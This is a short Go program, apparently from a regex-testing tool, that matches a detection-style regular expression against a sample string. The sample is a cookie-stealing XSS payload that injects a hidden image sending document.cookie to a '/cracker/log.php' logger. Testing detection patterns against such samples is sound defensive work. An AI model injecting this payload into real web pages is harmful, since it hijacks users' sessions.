package main
import (
"regexp"
"fmt"
)
func main() {
var re = regexp.MustCompile(`(?:[\s\/"]+[-\w\/\\\*]+\s*=.+(?:\/\s*>))`)
var str = `this.style.display='none';this.insertAdjacentHTML('afterend','<img src="/cracker/log.php?cookie='+encodeURIComponent(document.cookie)+'" style="display:none" />');`
if len(re.FindStringIndex(str)) > 0 {
fmt.Println(re.FindString(str),"found at index",re.FindStringIndex(str)[0])
}
}